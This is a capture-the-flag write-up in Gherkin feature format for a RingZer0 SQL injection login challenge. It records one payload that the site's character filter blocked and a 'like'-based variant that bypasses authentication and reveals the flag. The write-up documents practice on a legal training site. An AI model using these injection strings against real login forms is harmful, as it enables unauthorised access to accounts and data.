## Version 2.0
## language: en

Feature: dont-mess-with-noemie-ringerzeroctf
  Site:
    https://ringzer0ctf.com/challenges/52
  Category:
    SQL Injection
  User:
    john2104
  Goal:
    Login as admin

  Background:
  Hacker's software:
  | <Software name> | <Version>           |
  | NixOS           | 19.09.2260          |
  | Chromium        | 78.0.3904.87        |

  Machine information:
    Given the challenge URL
    """
    https://ringzer0ctf.com/challenges/52
    """
    When I open the url with Chrome
    Then I see a login form
  Scenario: Fail:Sql-injection
    Given the form
    And knowing that answer is correct when It returns:
    """
    FLAG-*********************
    """
    When I try with a well known payload
    """
    username=admin' or '1'='1&password=a
    """
    Then I get "Illegal characters detected."
    And I don't solve the challenge

   Scenario: Success:Sql-injection
    Given that I inspected the functionality
    And I see that they respond with "Wrong username / password."
    When I use the following payload
    """
    ' or 'a' like 'a
    """
    Then I used the following payload
    """
    ' or 'a' like 'a' or '
    """
    And I get the flag
    Then I solve the challenge
